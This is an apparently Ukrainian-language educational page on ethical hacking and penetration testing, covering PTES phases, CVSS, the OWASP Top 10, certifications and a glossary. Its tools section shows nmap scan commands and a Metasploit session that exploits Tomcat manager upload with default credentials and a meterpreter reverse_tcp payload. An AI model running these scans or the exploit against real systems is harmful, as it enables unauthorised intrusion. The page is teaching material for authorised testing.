CyberSec Pentest Lab
Cybersecurity

Етичний хакінг та тестування на проникнення

Комплексний посібник з кібербезпеки: методології пентестингу, збору інформації, сканування вразливостей, експлуатації та пост-експлуатації. Легальне тестування систем на міцність.

Kali Linux Metasploit Burp Suite OSCP

Що таке етичний хакінг і навіщо він потрібен

Етичний хакінг (Ethical Hacking) — це легальне тестування систем безпеки з дозволу власника. Мета — знайти вразливості раніше за зловмисників. Результатом є звіт з рекомендаціями щодо усунення знайдених проблем.

01

White Box Testing

Тестер має повну інформацію про систему: вихідний код, архітектуру, облікові дані. Дозволяє знайти глибокі логічні вразливості та проблеми дизайну.

02

Black Box Testing

Тестер має такий самий доступ як зовнішній атакер. Імітує реальну атаку — збирає інформацію через OSINT, сканує порти, шукає публічні експлойти.

03

Gray Box Testing

Комбінація підходів: частковий доступ (наприклад, обліковий запис користувача). Найпоширеніший сценарій — тестування з перспективи скомпрометованого акаунту.

Методологія тестування: PTES Framework

Penetration Testing Execution Standard (PTES) — узгоджена методологія, що складається з 7 фаз від початкового збору інформації до фінального звіту.

Pre-engagement
Intelligence Gathering
Threat Modeling
Vulnerability Analysis
Exploitation
Post Exploitation
Reporting

Розвідка (Reconnaissance)

Пасивний збір інформації без прямого контакту з ціллю: WHOIS, DNS enumeration, пошук у відкритих джерелах (OSINT), аналіз соціальних мереж співробітників. 90% успішних атак починаються з якісної розвідки.

Експлуатація (Exploitation)

Спроба використати знайдені вразливості для отримання доступу. Включає buffer overflow, SQL injection, credential stuffing, privilege escalation. Завжди з урахуванням правил зупинки (scope limitations).

Калькулятор оцінки ризиків CVSS 3.1

Common Vulnerability Scoring System — стандарт оцінки серйозності вразливостей. Розрахуйте базовий бал на основі метрик експлуатації та впливу.

Бал 9.0-10.0 = Critical, 7.0-8.9 = High, 4.0-6.9 = Medium, 0.1-3.9 = Low
CVSS Base Score -
Серйозність -
Exploitability -
Impact Score -
Візуалізація компонентів оцінки

Інструменти пентестера

Професійний арсенал для тестування на проникнення. Кожен інструмент має свою спеціалізацію та область застосування.

# Nmap - сканування портів та сервісів
+# Базове сканування відкритих портів
+nmap -sS -O target.com
+
+# Агресивне сканування з визначенням версій
+nmap -A -T4 -p- target.com
+
+# Сканування вразливостей за допомогою скриптів
+nmap --script vuln target.com
+
+# UDP сканування
+nmap -sU -p 53,67,68,161 target.com
+
+# Збереження результатів
+nmap -oN scan_results.txt target.com
# Metasploit Framework
+# Пошук експлойтів
+msf6 > search type:exploit name:apache
+
+# Використання модуля
+msf6 > use exploit/multi/http/tomcat_mgr_upload
+msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.1.10
+msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
+msf6 exploit(multi/http/tomcat_mgr_upload) > set USERNAME admin
+msf6 exploit(multi/http/tomcat_mgr_upload) > set PASSWORD password
+
+# Вибір payload
+msf6 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
+msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

Топ вразливостей OWASP Top 10 (2021)

Стандартний список найкритичніших ризиків безпеки веб-додатків. Кожен пентестер має перевіряти ці категорії в першу чергу.

Вразливість Ризик Приклад атаки Mitigation
A01 Broken Access Control Критичний IDOR, path traversal RBAC, deny by default
A02 Cryptographic Failures Критичний Weak encryption, plaintext AES-256-GCM, TLS 1.3
A03 Injection Критичний SQLi, Command injection Parameterized queries
A04 Insecure Design Високий Business logic flaws Threat modeling
A05 Security Misconfiguration Високий Default creds, debug mode Hardening, CIS benchmarks
A06 Vulnerable Components Високий Outdated libraries SBOM, dependency scanning

Золоті правила етичного хакера

  • Отримуйте письмовий дозвіл (Rules of Engagement) перед тестуванням.
  • Поважайте scope — не виходьте за межі дозволених систем.
  • Не модифікуйте дані без згоди — створюйте тестові файли.
  • Зберігайте конфіденційність — шифруйте звіти та логи.
  • Документуйте все — скріншоти, команди, часові мітки.

Кар'єрний шлях в кібербезпеці

Junior Penetration Tester

Базові навички: Linux, networking, Python, Burp Suite. Сертифікати: eJPT, CompTIA Security+.

Penetration Tester

Досвід 2+ роки. Глибоке розуміння веб-та мережевих атак. OSCP — must have.

Senior / Team Lead

Методології, звіти для C-level, red teaming. OSEP, OSWE сертифікації.

Security Consultant / Researcher

Стратегія безпеки, zero-day research, конференції (DEF CON, Black Hat).

FAQ

Чи легальний етичний хакінг?

Так, але за умови:

  • Письмового дозволу власника системи (Rule of Engagement).
  • Чітко визначеного scope — яких систем можна торкатися.
  • Згоди на певні типи тестів (DDoS, соціальна інженерія).

Без цих умов будь-яке тестування є кримінальним правопорушенням (ККУ ст. 361-363).

Які сертифікати найбільш цінні для пентестера?

Початковий рівень: CompTIA Security+, eJPT (eLearnSecurity), CEH.

Середній рівень: OSCP (Offensive Security Certified Professional) — золотий стандарт індустрії. 24-годинний практичний екзамен.

Просунутий: OSEP (Evasion), OSWE (Web), OSED (Exploit Development), CRTO (Cobalt Strike), GXPN.

Як почати кар'єру без досвіду?
  • Платформи для практики: Hack The Box, TryHackMe, VulnHub — безкоштовні CTF.
  • Читайте write-ups після вирішення завдань.
  • Створіть home lab: VirtualBox + Kali + Metasploitable.
  • Беріть участь в bug bounty програмах (HackerOne, Bugcrowd).
  • Публікуйте write-ups в блозі — це ваше портфоліо.
Що таке Red Team vs Blue Team?

Red Team — атакувальна сторона, імітує реальних зловмисників. Мета — показати реальні наслідки компрометації. Використовує TTPs (Tactics, Techniques, Procedures).

Blue Team — захисна сторона. Моніторинг, реагування на інциденти, hardening, створення правил детектування (SIEM, IDS).

Purple Team — співпраця Red та Blue для покращення захисту.

Як захиститися від найпоширеніших атак?
  • SQL Injection: Prepared statements, ORM, WAF.
  • XSS: Context-aware encoding, CSP headers.
  • CSRF: CSRF-токени, SameSite cookies.
  • Weak Auth: MFA, rate limiting, strong password policy.
  • Phishing: Security awareness training, email filtering (SPF, DKIM, DMARC).
Що таке Bug Bounty?

Програми, де компанії платять за знайдені вразливості в їхніх системах. Популярні платформи:

  • HackerOne — найбільша платформа (Google, Facebook, Uber).
  • Bugcrowd — managed programs, хороша для початківців.
  • Intigriti — європейська платформа.
  • Open Bug Bounty — координація без винагороди (для портфоліо).

Суми винагород: від $100 за low severity до $50,000+ за critical (RCE).

Глосарій кібербезпеки

Exploit

Код або послідовність дій, що використовує вразливість для отримання неавторизованого доступу або виконання довільного коду.

Payload

Частина експлойта, що виконується після успішної компрометації. Наприклад, reverse shell, meterpreter session, ransomware.

0-day

Вразливість, невідома виробнику і ще не виправлена. Найнебезпечніший тип — немає патчів для захисту.

Shell

Інтерфейс командного рядка на скомпрометованій системі. Bind shell — пряме підключення, reverse shell — зворотне (обходить firewall).

Privilege Escalation

Підвищення прав доступу в системі: від звичайного користувача до адміністратора (vertical) або до іншого користувача (horizontal).

Lateral Movement

Рух всередині скомпрометованої мережі від однієї системи до іншої з метою знаходження цінних активів (domain controller, databases).